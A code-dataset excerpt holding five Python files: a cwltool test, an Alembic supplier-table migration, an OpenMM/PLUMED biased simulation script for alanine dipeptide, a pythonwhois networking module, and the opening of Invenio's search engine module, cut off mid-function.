| text (stringlengths 6-947k) | repo_name (stringlengths 5-100) | path (stringlengths 4-231) | language (stringclasses 1 value) | license (stringclasses 15 values) | size (int64 6-947k) | score (float64 0-0.34) |
|---|---|---|---|---|---|---|
from io import StringIO
from pathlib import Path
from cwltool.main import main
from .util import get_data
def test_empty_input(tmp_path: Path) -> None:
"""Affirm that an empty input works."""
empty_json = "{}"
empty_input = StringIO(empty_json)
params = [
"--outdir",
str(tmp_path),
get_data("tests/wf/no-parameters-echo.cwl"),
"-",
]
try:
assert main(params, stdin=empty_input) == 0
except SystemExit as err:
assert err.code == 0
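# Hedged usage note (not part of the original test): the trailing "-" argument makes
# cwltool read the job-order JSON from stdin, so a roughly equivalent shell invocation
# would be something like:
#   echo '{}' | cwltool --outdir /tmp/out tests/wf/no-parameters-echo.cwl -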
|
common-workflow-language/cwltool
|
tests/test_empty_input.py
|
Python
|
apache-2.0
| 513
| 0
|
""" Extend suppliers table with new fields (to be initially populated from declaration data)
Revision ID: 940
Revises: 930
Create Date: 2017-08-16 16:39:00.000000
"""
# revision identifiers, used by Alembic.
revision = '940'
down_revision = '930'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column(u'suppliers', sa.Column('registered_name', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('registration_country', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('other_company_registration_number', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('registration_date', sa.DateTime(), nullable=True))
op.add_column(u'suppliers', sa.Column('vat_number', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('organisation_size', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('trading_status', sa.String(), nullable=True))
def downgrade():
op.drop_column(u'suppliers', 'registered_name')
op.drop_column(u'suppliers', 'registration_country')
op.drop_column(u'suppliers', 'other_company_registration_number')
op.drop_column(u'suppliers', 'registration_date')
op.drop_column(u'suppliers', 'vat_number')
op.drop_column(u'suppliers', 'organisation_size')
op.drop_column(u'suppliers', 'trading_status')
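# Hedged usage sketch (standard Alembic CLI, assuming a configured alembic.ini or an
# equivalent migration wrapper in this project; commands are illustrative only):
#   alembic upgrade 940     # apply this revision
#   alembic downgrade 930   # revert to the previous revision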
|
alphagov/digitalmarketplace-api
|
migrations/versions/940_more_supplier_details.py
|
Python
|
mit
| 1,372
| 0.007289
|
"""
This file is for biased simulation for alanine dipeptide only, it is used as the test for
more general file biased_simulation_general.py, which could be easily extend to other new
systems.
"""
from ANN_simulation import *
from simtk.openmm.app import *
from simtk.openmm import *
from simtk.unit import *
from sys import stdout
import ast, argparse
import os
import re            # used below when parsing the layer_types / num_of_nodes strings
import subprocess    # used below by the fc_adjustable and SSAGES code paths
import numpy as np   # used below for np.load of the autoencoder coefficients and np.pi
import datetime
from config import *
parser = argparse.ArgumentParser()
parser.add_argument("record_interval", type=int, help="interval to take snapshots")
parser.add_argument("total_num_of_steps", type=int, help="total number of simulation steps")
parser.add_argument("force_constant", type=float, help="force constants")
parser.add_argument("folder_to_store_output_files", type=str, help="folder to store the output pdb and report files")
parser.add_argument("autoencoder_info_file", type=str, help="file to store autoencoder information (coefficients)")
parser.add_argument("pc_potential_center", type=str, help="potential center (should include 'pc_' as prefix)")
parser.add_argument("--out_traj", type=str, default=None, help="output trajectory file")
parser.add_argument("--layer_types", type=str, default=str(CONFIG_27), help='layer types')
parser.add_argument("--num_of_nodes", type=str, default=str(CONFIG_3[:3]), help='number of nodes in each layer')
parser.add_argument("--temperature", type=int, default= CONFIG_21, help='simulation temperature')
parser.add_argument("--data_type_in_input_layer", type=int, default=1, help='data_type_in_input_layer, 0 = cos/sin, 1 = Cartesian coordinates')
parser.add_argument("--platform", type=str, default=CONFIG_23, help='platform on which the simulation is run')
parser.add_argument("--scaling_factor", type=float, default = float(CONFIG_49), help='scaling_factor for ANN_Force')
parser.add_argument("--starting_pdb_file", type=str, default='../resources/alanine_dipeptide.pdb', help='the input pdb file to start simulation')
parser.add_argument("--starting_frame", type=int, default=0, help="index of starting frame in the starting pdb file")
parser.add_argument("--minimize_energy", type=int, default=1, help='whether to minimize energy (1 = yes, 0 = no)')
parser.add_argument("--equilibration_steps", type=int, default=1000, help="number of steps for the equilibration process")
# next few options are for metadynamics
parser.add_argument("--bias_method", type=str, default='US', help="biasing method for enhanced sampling, US = umbrella sampling, MTD = metadynamics")
parser.add_argument("--MTD_pace", type=int, default=CONFIG_66, help="pace of metadynamics")
parser.add_argument("--MTD_height", type=float, default=CONFIG_67, help="height of metadynamics")
parser.add_argument("--MTD_sigma", type=float, default=CONFIG_68, help="sigma of metadynamics")
parser.add_argument("--MTD_WT", type=int, default=CONFIG_69, help="whether to use well-tempered version")
parser.add_argument("--MTD_biasfactor", type=float, default=CONFIG_70, help="biasfactor of well-tempered metadynamics")
# following is for plumed script
parser.add_argument("--plumed_file", type=str, default=None, help="plumed script for biasing force, used only when the bias_method == plumed_other")
parser.add_argument("--plumed_add_string", type=str, default="", help="additional string to be attached to the end of plumed script in args.plumed_file")
# note on "force_constant_adjustable" mode:
# the simulation will stop if either:
# force constant is greater or equal to max_force_constant
# or distance between center of data cloud and potential center is smaller than distance_tolerance
parser.add_argument("--fc_adjustable", help="set the force constant to be adjustable", action="store_true")
parser.add_argument("--max_fc", type=float, default=CONFIG_32, help="max force constant (for force_constant_adjustable mode)")
parser.add_argument("--fc_step", type=float, default=CONFIG_34, help="the value by which the force constant is increased each time (for force_constant_adjustable mode)")
parser.add_argument("--distance_tolerance", type=float, default=CONFIG_35, help="max distance allowed between center of data cloud and potential center (for force_constant_adjustable mode)")
parser.add_argument("--autoencoder_file", type=str, help="pkl file that stores autoencoder (for force_constant_adjustable mode)")
parser.add_argument("--remove_previous", help="remove previous outputs while adjusting force constants", action="store_true")
args = parser.parse_args()
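# Illustrative invocation (hypothetical values and paths, shown only to clarify the
# positional-argument order defined above):
#   python biased_simulation.py 500 50000 1000.0 ../target/test_output \
#       ../resources/autoencoder_info.npy pc_0.1,-0.2 --bias_method US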
record_interval = args.record_interval
total_number_of_steps = args.total_num_of_steps
input_data_type = ['cossin', 'Cartesian', 'pairwise'][args.data_type_in_input_layer]
force_constant = args.force_constant
scaling_factor = args.scaling_factor
layer_types = re.sub(r"\[|\]|\"|\'| ", '', args.layer_types).split(',')
num_of_nodes = re.sub(r"\[|\]|\"|\'| ", '', args.num_of_nodes).split(',')
num_of_nodes = [int(item) for item in num_of_nodes]
out_format = '.dcd' if args.out_traj is None else os.path.splitext(args.out_traj)[1]
if float(force_constant) != 0:
from ANN import *
folder_to_store_output_files = args.folder_to_store_output_files # this is used to separate outputs for different networks into different folders
autoencoder_info_file = args.autoencoder_info_file
potential_center = list([float(x) for x in args.pc_potential_center.replace('"','')\
.replace('pc_','').split(',')]) # this API is the generalization for higher-dimensional cases
if not os.path.exists(folder_to_store_output_files):
    try: os.makedirs(folder_to_store_output_files)
    except OSError: pass   # ignore a race where another process creates the directory first
def run_simulation(force_constant):
assert(os.path.exists(folder_to_store_output_files))
input_pdb_file_of_molecule = args.starting_pdb_file
force_field_file = 'amber99sb.xml'
water_field_file = 'tip3p.xml'
pdb_reporter_file = '%s/output_fc_%f_pc_%s.pdb' %(folder_to_store_output_files, force_constant, str(potential_center).replace(' ',''))
    if args.out_traj is not None:
pdb_reporter_file = args.out_traj
state_data_reporter_file = pdb_reporter_file.replace('output_fc', 'report_fc').replace('.pdb', '.txt')
    # back up the output files if they already exist
for item_filename in [pdb_reporter_file, state_data_reporter_file]:
Helper_func.backup_rename_file_if_exists(item_filename)
index_of_backbone_atoms = CONFIG_57[0]
flag_random_seed = 0 # whether we need to fix this random seed
simulation_temperature = args.temperature
time_step = CONFIG_22 # simulation time step, in ps
pdb = PDBFile(input_pdb_file_of_molecule)
modeller = Modeller(pdb.topology, pdb.getPositions(frame=args.starting_frame))
solvent_opt = 'no_water'
if solvent_opt == 'explicit':
forcefield = ForceField(force_field_file, water_field_file)
modeller.addSolvent(forcefield, model=water_field_file.split('.xml')[0], boxSize=Vec3(3, 3, 3) * nanometers,
ionicStrength=0 * molar)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=PME, nonbondedCutoff=1.0 * nanometers,
constraints=AllBonds, ewaldErrorTolerance=0.0005)
else:
forcefield = ForceField(force_field_file)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=NoCutoff, constraints=AllBonds)
if args.bias_method == "US":
if float(force_constant) != 0:
force = ANN_Force()
force.set_layer_types(layer_types)
force.set_data_type_in_input_layer(args.data_type_in_input_layer)
force.set_list_of_index_of_atoms_forming_dihedrals_from_index_of_backbone_atoms(index_of_backbone_atoms)
force.set_index_of_backbone_atoms(index_of_backbone_atoms)
if args.data_type_in_input_layer == 2:
force.set_list_of_pair_index_for_distances(CONFIG_80)
force.set_num_of_nodes(num_of_nodes)
force.set_potential_center(potential_center)
force.set_force_constant(float(force_constant))
unit_scaling = 1.0 # TODO: check unit scaling
force.set_scaling_factor(float(scaling_factor) / unit_scaling) # since default unit is nm in OpenMM
# TODO: need to fix following for multi-hidden layer cases
temp_coeffs, temp_bias = np.load(autoencoder_info_file)
for item_layer_index in [0, 1]:
assert (len(temp_coeffs[item_layer_index]) ==
num_of_nodes[item_layer_index] * num_of_nodes[item_layer_index + 1]), (len(temp_coeffs[item_layer_index]),
(num_of_nodes[item_layer_index], num_of_nodes[item_layer_index + 1]))
assert (len(temp_bias[item_layer_index]) == num_of_nodes[item_layer_index + 1]), (len(temp_bias[item_layer_index]), num_of_nodes[item_layer_index + 1])
# need tolist() since C++ only accepts Python list
force.set_coeffients_of_connections([item_w.tolist() for item_w in temp_coeffs])
force.set_values_of_biased_nodes([item_w.tolist() for item_w in temp_bias])
system.addForce(force)
elif args.bias_method == "US_on_phipsi":
from openmmplumed import PlumedForce
kappa_string = ','.join([str(force_constant) for _ in potential_center])
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
restraint: RESTRAINT ARG=phi,psi AT=%f,%f KAPPA=%s
PRINT STRIDE=10 ARG=* FILE=COLVAR
""" % (potential_center[0], potential_center[1], kappa_string)
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "MTD":
from openmmplumed import PlumedForce
plumed_force_string = Alanine_dipeptide.get_expression_script_for_plumed()
with open(autoencoder_info_file, 'r') as f_in:
plumed_force_string += f_in.read()
# note that dimensionality of MTD is determined by potential_center string
plumed_script_ANN_mode = 'ANN'
if plumed_script_ANN_mode == 'native':
mtd_output_layer_string = ['l_2_out_%d' % item for item in range(len(potential_center))]
elif plumed_script_ANN_mode == 'ANN':
mtd_output_layer_string = ['ann_force.%d' % item for item in range(len(potential_center))]
else: raise Exception('mode error')
mtd_output_layer_string = ','.join(mtd_output_layer_string)
mtd_sigma_string = ','.join([str(args.MTD_sigma) for _ in range(len(potential_center))])
if args.MTD_WT:
mtd_well_tempered_string = 'TEMP=%d BIASFACTOR=%f' % (args.temperature, args.MTD_biasfactor)
else:
mtd_well_tempered_string = ""
plumed_force_string += """
metad: METAD ARG=%s PACE=%d HEIGHT=%f SIGMA=%s FILE=temp_MTD_hills.txt %s
PRINT STRIDE=%d ARG=%s,metad.bias FILE=temp_MTD_out.txt
""" % (mtd_output_layer_string, args.MTD_pace, args.MTD_height, mtd_sigma_string, mtd_well_tempered_string,
record_interval, mtd_output_layer_string)
# print plumed_force_string
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "SMD":
# TODO: this is temporary version
from openmmplumed import PlumedForce
kappa_string = '1000,1000'
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
restraint: MOVINGRESTRAINT ARG=phi,psi AT0=-1.5,1.0 STEP0=0 KAPPA0=%s AT1=1.0,-1.0 STEP1=%d KAPPA1=%s
PRINT STRIDE=10 ARG=* FILE=COLVAR
""" % (kappa_string, total_number_of_steps, kappa_string)
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "TMD": # targeted MD
# TODO: this is temporary version
from openmmplumed import PlumedForce
kappa_string = '10000'
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
rmsd: RMSD REFERENCE=../resources/alanine_ref_1_TMD.pdb TYPE=OPTIMAL
restraint: MOVINGRESTRAINT ARG=rmsd AT0=0 STEP0=0 KAPPA0=0 AT1=0 STEP1=%d KAPPA1=%s
PRINT STRIDE=10 ARG=* FILE=COLVAR
""" % (total_number_of_steps, kappa_string)
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "plumed_other":
from openmmplumed import PlumedForce
with open(args.plumed_file, 'r') as f_in:
plumed_force_string = f_in.read().strip() + args.plumed_add_string
system.addForce(PlumedForce(plumed_force_string))
else:
raise Exception('bias method error')
# end of biased force
integrator = LangevinIntegrator(simulation_temperature*kelvin, 1/picosecond, time_step*picoseconds)
if flag_random_seed:
integrator.setRandomNumberSeed(1) # set random seed
platform = Platform.getPlatformByName(args.platform)
platform.loadPluginsFromDirectory(CONFIG_25) # load the plugin from specific directory
simulation = Simulation(modeller.topology, system, integrator, platform)
simulation.context.setPositions(modeller.positions)
if args.minimize_energy:
print('begin Minimizing energy...')
print(datetime.datetime.now())
simulation.minimizeEnergy()
print('Done minimizing energy.')
print(datetime.datetime.now())
else:
print('energy minimization not required')
simulation.step(args.equilibration_steps)
if out_format == '.pdb':
simulation.reporters.append(PDBReporter(pdb_reporter_file, record_interval))
elif out_format == '.dcd':
simulation.reporters.append(DCDReporter(pdb_reporter_file.replace('.pdb', '.dcd'), record_interval))
simulation.reporters.append(StateDataReporter(state_data_reporter_file, record_interval,
step=True, potentialEnergy=True, kineticEnergy=True, speed=True,
temperature=True, progress=True, remainingTime=True,
totalSteps=total_number_of_steps + args.equilibration_steps,
))
simulation.step(total_number_of_steps)
print('Done biased simulation!')
return pdb_reporter_file
def get_distance_between_data_cloud_center_and_potential_center(pdb_file):
coor_file = Alanine_dipeptide().generate_coordinates_from_pdb_files(pdb_file)[0]
temp_network = autoencoder.load_from_pkl_file(args.autoencoder_file)
this_simulation_data = single_biased_simulation_data(temp_network, coor_file)
offset = this_simulation_data.get_offset_between_potential_center_and_data_cloud_center(input_data_type)
if layer_types[1] == "Circular":
offset = [min(abs(item), abs(item + 2 * np.pi), abs(item - 2 * np.pi)) for item in offset]
print("circular offset")
print('offset = %s' % str(offset))
distance = sqrt(sum([item * item for item in offset]))
return distance
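# Note (illustrative): when the output layer is "Circular", each offset component above is
# wrapped onto a 2*pi period before the distance is measured; e.g. a raw offset of 5.0 rad
# is reduced to |5.0 - 2*pi| ~= 1.28 rad.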
def run_simulation_ssages(force_constant):
ssages_output_file = '%s/output_fc_%f_pc_%s.json' % (
folder_to_store_output_files, force_constant, str(potential_center).replace(' ', ''))
subprocess.check_output('python ../src/temp_create_json_ssages.py %s %s %s %s %s' % (
ssages_output_file, str(potential_center).replace(' ', ''), autoencoder_info_file.replace('.npy', '.txt'),
ssages_output_file.replace('.json', '.trr'), force_constant), shell=True)
command = "ssages " + ssages_output_file
subprocess.check_output(command, shell=True)
pdb_reporter_file = ssages_output_file.replace('.json', '.pdb')
subprocess.check_output('mdconvert -o %s %s -t ../resources/alanine_dipeptide.pdb' % (
pdb_reporter_file, pdb_reporter_file.replace('.pdb', '.trr')), shell = True)
return pdb_reporter_file
if __name__ == '__main__':
if not args.fc_adjustable:
run_simulation(args.force_constant)
else:
force_constant = args.force_constant
distance_of_data_cloud_center = float("inf")
while force_constant < args.max_fc and distance_of_data_cloud_center > args.distance_tolerance:
if args.remove_previous:
try:
command = 'rm %s/*%s*' % (folder_to_store_output_files, str(potential_center).replace(' ',''))
command = command.replace('[','').replace(']','')
subprocess.check_output(command, shell=True)
print("removing previous results...")
except:
pass
pdb_file = run_simulation(force_constant)
distance_of_data_cloud_center = get_distance_between_data_cloud_center_and_potential_center(pdb_file)
force_constant += args.fc_step
print("distance_between_data_cloud_center_and_potential_center = %f" % distance_of_data_cloud_center)
|
weiHelloWorld/accelerated_sampling_with_autoencoder
|
MD_simulation_on_alanine_dipeptide/current_work/src/biased_simulation.py
|
Python
|
mit
| 16,759
| 0.007101
|
import socket, re, sys
from codecs import encode, decode
from . import shared
def get_whois_raw(domain, server="", previous=None, rfc3490=True, never_cut=False, with_server_list=False, server_list=None):
previous = previous or []
server_list = server_list or []
# Sometimes IANA simply won't give us the right root WHOIS server
exceptions = {
".ac.uk": "whois.ja.net",
".ps": "whois.pnina.ps",
".buzz": "whois.nic.buzz",
".moe": "whois.nic.moe",
# The following is a bit hacky, but IANA won't return the right answer for example.com because it's a direct registration.
"example.com": "whois.verisign-grs.com"
}
if rfc3490:
if sys.version_info < (3, 0):
domain = encode( domain if type(domain) is unicode else decode(domain, "utf8"), "idna" )
else:
domain = encode(domain, "idna").decode("ascii")
if len(previous) == 0 and server == "":
# Root query
is_exception = False
for exception, exc_serv in exceptions.items():
if domain.endswith(exception):
is_exception = True
target_server = exc_serv
break
if is_exception == False:
target_server = get_root_server(domain)
else:
target_server = server
if target_server == "whois.jprs.jp":
request_domain = "%s/e" % domain # Suppress Japanese output
elif domain.endswith(".de") and ( target_server == "whois.denic.de" or target_server == "de.whois-servers.net" ):
request_domain = "-T dn,ace %s" % domain # regional specific stuff
elif target_server == "whois.verisign-grs.com":
request_domain = "=%s" % domain # Avoid partial matches
else:
request_domain = domain
response = whois_request(request_domain, target_server)
if never_cut:
# If the caller has requested to 'never cut' responses, he will get the original response from the server (this is
# useful for callers that are only interested in the raw data). Otherwise, if the target is verisign-grs, we will
# select the data relevant to the requested domain, and discard the rest, so that in a multiple-option response the
# parsing code will only touch the information relevant to the requested domain. The side-effect of this is that
# when `never_cut` is set to False, any verisign-grs responses in the raw data will be missing header, footer, and
# alternative domain options (this is handled a few lines below, after the verisign-grs processing).
new_list = [response] + previous
if target_server == "whois.verisign-grs.com":
# VeriSign is a little... special. As it may return multiple full records and there's no way to do an exact query,
# we need to actually find the correct record in the list.
for record in response.split("\n\n"):
if re.search("Domain Name: %s\n" % domain.upper(), record):
response = record
break
if never_cut == False:
new_list = [response] + previous
server_list.append(target_server)
for line in [x.strip() for x in response.splitlines()]:
match = re.match("(refer|whois server|referral url|whois server|registrar whois):\s*([^\s]+\.[^\s]+)", line, re.IGNORECASE)
if match is not None:
referal_server = match.group(2)
if referal_server != server and "://" not in referal_server: # We want to ignore anything non-WHOIS (eg. HTTP) for now.
# Referal to another WHOIS server...
return get_whois_raw(domain, referal_server, new_list, server_list=server_list, with_server_list=with_server_list)
if with_server_list:
return (new_list, server_list)
else:
return new_list
def get_root_server(domain):
data = whois_request(domain, "whois.iana.org")
for line in [x.strip() for x in data.splitlines()]:
match = re.match("refer:\s*([^\s]+)", line)
if match is None:
continue
return match.group(1)
raise shared.WhoisException("No root WHOIS server found for domain.")
def whois_request(domain, server, port=43):
socket.setdefaulttimeout(5)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((server, port))
sock.send(("%s\r\n" % domain).encode("utf-8"))
buff = b""
while True:
data = sock.recv(1024)
if len(data) == 0:
break
buff += data
return buff.decode("utf-8")
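# Minimal usage sketch (illustrative; assumes the package is importable as pythonwhois and
# that outbound TCP port 43 is reachable):
#   from pythonwhois.net import get_whois_raw
#   records, servers = get_whois_raw("example.com", with_server_list=True)
#   print(servers[-1])       # last WHOIS server queried
#   print(records[0][:200])  # beginning of the raw response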
|
goocarlos/domaindiscoverer
|
pythonwhois/net.py
|
Python
|
apache-2.0
| 4,072
| 0.030452
|
# -*- coding: utf-8 -*-
## This file is part of Invenio.
## Copyright (C) 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
# pylint: disable=C0301
"""Invenio Search Engine in mod_python."""
__lastupdated__ = """$Date$"""
__revision__ = "$Id$"
## import general modules:
import cgi
import cStringIO
import copy
import string
import os
import re
import time
import urllib
import urlparse
import zlib
import sys
try:
## import optional module:
import numpy
CFG_NUMPY_IMPORTABLE = True
except ImportError:
CFG_NUMPY_IMPORTABLE = False
if sys.hexversion < 0x2040000:
# pylint: disable=W0622
from sets import Set as set
# pylint: enable=W0622
## import Invenio stuff:
from invenio.config import \
CFG_CERN_SITE, \
CFG_INSPIRE_SITE, \
CFG_OAI_ID_FIELD, \
CFG_WEBCOMMENT_ALLOW_REVIEWS, \
CFG_WEBSEARCH_CALL_BIBFORMAT, \
CFG_WEBSEARCH_CREATE_SIMILARLY_NAMED_AUTHORS_LINK_BOX, \
CFG_WEBSEARCH_FIELDS_CONVERT, \
CFG_WEBSEARCH_NB_RECORDS_TO_SORT, \
CFG_WEBSEARCH_SEARCH_CACHE_SIZE, \
CFG_WEBSEARCH_SEARCH_CACHE_TIMEOUT, \
CFG_WEBSEARCH_USE_MATHJAX_FOR_FORMATS, \
CFG_WEBSEARCH_USE_ALEPH_SYSNOS, \
CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS, \
CFG_WEBSEARCH_FULLTEXT_SNIPPETS, \
CFG_WEBSEARCH_DISPLAY_NEAREST_TERMS, \
CFG_WEBSEARCH_WILDCARD_LIMIT, \
CFG_BIBUPLOAD_SERIALIZE_RECORD_STRUCTURE, \
CFG_BIBUPLOAD_EXTERNAL_SYSNO_TAG, \
CFG_BIBRANK_SHOW_DOWNLOAD_GRAPHS, \
CFG_WEBSEARCH_SYNONYM_KBRS, \
CFG_SITE_LANG, \
CFG_SITE_NAME, \
CFG_LOGDIR, \
CFG_BIBFORMAT_HIDDEN_TAGS, \
CFG_SITE_URL, \
CFG_ACCESS_CONTROL_LEVEL_ACCOUNTS, \
CFG_SOLR_URL, \
CFG_WEBSEARCH_DETAILED_META_FORMAT, \
CFG_SITE_RECORD, \
CFG_WEBSEARCH_PREV_NEXT_HIT_LIMIT, \
CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY, \
CFG_BIBSORT_BUCKETS, \
CFG_XAPIAN_ENABLED, \
CFG_BIBINDEX_CHARS_PUNCTUATION
from invenio.search_engine_config import \
InvenioWebSearchUnknownCollectionError, \
InvenioWebSearchWildcardLimitError, \
CFG_WEBSEARCH_IDXPAIRS_FIELDS,\
CFG_WEBSEARCH_IDXPAIRS_EXACT_SEARCH, \
CFG_SEARCH_RESULTS_CACHE_PREFIX
from invenio.search_engine_utils import get_fieldvalues, get_fieldvalues_alephseq_like
from invenio.bibrecord import create_record, record_xml_output
from invenio.bibrank_record_sorter import get_bibrank_methods, is_method_valid, rank_records as rank_records_bibrank
from invenio.bibrank_downloads_similarity import register_page_view_event, calculate_reading_similarity_list
from invenio.bibindex_engine_stemmer import stem
from invenio.bibindex_tokenizers.BibIndexDefaultTokenizer import BibIndexDefaultTokenizer
from invenio.bibindex_tokenizers.BibIndexCJKTokenizer import BibIndexCJKTokenizer, is_there_any_CJK_character_in_text
from invenio.bibindex_engine_utils import author_name_requires_phrase_search
from invenio.bibindex_engine_washer import wash_index_term, lower_index_term, wash_author_name
from invenio.bibindex_engine_config import CFG_BIBINDEX_SYNONYM_MATCH_TYPE
from invenio.bibindex_engine_utils import get_idx_indexer
from invenio.bibformat import format_record, format_records, get_output_format_content_type, create_excel
from invenio.bibformat_config import CFG_BIBFORMAT_USE_OLD_BIBFORMAT
from invenio.bibrank_downloads_grapher import create_download_history_graph_and_box
from invenio.bibknowledge import get_kbr_values
from invenio.data_cacher import DataCacher
from invenio.websearch_external_collections import print_external_results_overview, perform_external_collection_search
from invenio.access_control_admin import acc_get_action_id
from invenio.access_control_config import VIEWRESTRCOLL, \
CFG_ACC_GRANT_AUTHOR_RIGHTS_TO_EMAILS_IN_TAGS, \
CFG_ACC_GRANT_VIEWER_RIGHTS_TO_EMAILS_IN_TAGS
from invenio.websearchadminlib import get_detailed_page_tabs, get_detailed_page_tabs_counts
from invenio.intbitset import intbitset
from invenio.dbquery import DatabaseError, deserialize_via_marshal, InvenioDbQueryWildcardLimitError
from invenio.access_control_engine import acc_authorize_action
from invenio.errorlib import register_exception
from invenio.textutils import encode_for_xml, wash_for_utf8, strip_accents
from invenio.htmlutils import get_mathjax_header
from invenio.htmlutils import nmtoken_from_string
import invenio.template
webstyle_templates = invenio.template.load('webstyle')
webcomment_templates = invenio.template.load('webcomment')
from invenio.bibrank_citation_searcher import calculate_cited_by_list, \
calculate_co_cited_with_list, get_records_with_num_cites, get_self_cited_by, \
get_refersto_hitset, get_citedby_hitset
from invenio.bibrank_citation_grapher import create_citation_history_graph_and_box
from invenio.dbquery import run_sql, run_sql_with_limit, wash_table_column_name, \
get_table_update_time
from invenio.webuser import getUid, collect_user_info, session_param_set
from invenio.webpage import pageheaderonly, pagefooteronly, create_error_box, write_warning
from invenio.messages import gettext_set_language
from invenio.search_engine_query_parser import SearchQueryParenthesisedParser, \
SpiresToInvenioSyntaxConverter
from invenio import webinterface_handler_config as apache
from invenio.solrutils_bibindex_searcher import solr_get_bitset
from invenio.xapianutils_bibindex_searcher import xapian_get_bitset
try:
import invenio.template
websearch_templates = invenio.template.load('websearch')
except Exception:
pass
from invenio.websearch_external_collections import calculate_hosted_collections_results, do_calculate_hosted_collections_results
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_ANTE_SEARCH
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_POST_SEARCH
from invenio.websearch_external_collections_config import CFG_EXTERNAL_COLLECTION_MAXRESULTS
VIEWRESTRCOLL_ID = acc_get_action_id(VIEWRESTRCOLL)
## global vars:
cfg_nb_browse_seen_records = 100 # limit on the number of records to check when browsing a certain collection
cfg_nicely_ordered_collection_list = 0 # do we propose the collection list nicely ordered or alphabetically?
## precompile some often-used regexp for speed reasons:
re_word = re.compile(r'[\s]')
re_quotes = re.compile(r'[\'\"]')
re_doublequote = re.compile(r'\"')
re_logical_and = re.compile(r'\sand\s', re.I)
re_logical_or = re.compile(r'\sor\s', re.I)
re_logical_not = re.compile(r'\snot\s', re.I)
re_operators = re.compile(r'\s([\+\-\|])\s')
re_pattern_wildcards_after_spaces = re.compile(r'(\s)[\*\%]+')
re_pattern_single_quotes = re.compile("'(.*?)'")
re_pattern_double_quotes = re.compile(r'\"(.*?)\"')
re_pattern_parens_quotes = re.compile(r'[\'\"]{1}[^\'\"]*(\([^\'\"]*\))[^\'\"]*[\'\"]{1}')
re_pattern_regexp_quotes = re.compile(r'\/(.*?)\/')
re_pattern_spaces_after_colon = re.compile(r'(:\s+)')
re_pattern_short_words = re.compile(r'([\s\"]\w{1,3})[\*\%]+')
re_pattern_space = re.compile("__SPACE__")
re_pattern_today = re.compile(r'\$TODAY\$')
re_pattern_parens = re.compile(r'\([^\)]+\s+[^\)]+\)')
re_punctuation_followed_by_space = re.compile(CFG_BIBINDEX_CHARS_PUNCTUATION + r'\s')
## em possible values
EM_REPOSITORY={"body" : "B",
"header" : "H",
"footer" : "F",
"search_box" : "S",
"see_also_box" : "L",
"basket" : "K",
"alert" : "A",
"search_info" : "I",
"overview" : "O",
"all_portalboxes" : "P",
"te_portalbox" : "Pte",
"tp_portalbox" : "Ptp",
"np_portalbox" : "Pnp",
"ne_portalbox" : "Pne",
"lt_portalbox" : "Plt",
"rt_portalbox" : "Prt"};
class RestrictedCollectionDataCacher(DataCacher):
def __init__(self):
def cache_filler():
ret = []
try:
res = run_sql("""SELECT DISTINCT ar.value
FROM accROLE_accACTION_accARGUMENT raa JOIN accARGUMENT ar ON raa.id_accARGUMENT = ar.id
WHERE ar.keyword = 'collection' AND raa.id_accACTION = %s""", (VIEWRESTRCOLL_ID,), run_on_slave=True)
except Exception:
# database problems, return empty cache
return []
for coll in res:
ret.append(coll[0])
return ret
def timestamp_verifier():
return max(get_table_update_time('accROLE_accACTION_accARGUMENT'), get_table_update_time('accARGUMENT'))
DataCacher.__init__(self, cache_filler, timestamp_verifier)
def collection_restricted_p(collection, recreate_cache_if_needed=True):
if recreate_cache_if_needed:
restricted_collection_cache.recreate_cache_if_needed()
return collection in restricted_collection_cache.cache
try:
restricted_collection_cache.is_ok_p
except Exception:
restricted_collection_cache = RestrictedCollectionDataCacher()
def ziplist(*lists):
"""Just like zip(), but returns lists of lists instead of lists of tuples
Example:
zip([f1, f2, f3], [p1, p2, p3], [op1, op2, '']) =>
[(f1, p1, op1), (f2, p2, op2), (f3, p3, '')]
ziplist([f1, f2, f3], [p1, p2, p3], [op1, op2, '']) =>
[[f1, p1, op1], [f2, p2, op2], [f3, p3, '']]
FIXME: This is handy to have, and should live somewhere else, like
miscutil.really_useful_functions or something.
XXX: Starting in python 2.6, the same can be achieved (faster) by
using itertools.izip_longest(); when the minimum recommended Python
is bumped, we should use that instead.
"""
def l(*items):
return list(items)
return map(l, *lists)
def get_permitted_restricted_collections(user_info, recreate_cache_if_needed=True):
"""Return a list of collection that are restricted but for which the user
is authorized."""
if recreate_cache_if_needed:
restricted_collection_cache.recreate_cache_if_needed()
ret = []
for collection in restricted_collection_cache.cache:
if acc_authorize_action(user_info, 'viewrestrcoll', collection=collection)[0] == 0:
ret.append(collection)
return ret
def get_all_restricted_recids():
"""
Return the set of all the restricted recids, i.e. the ids of those records
which belong to at least one restricted collection.
"""
ret = intbitset()
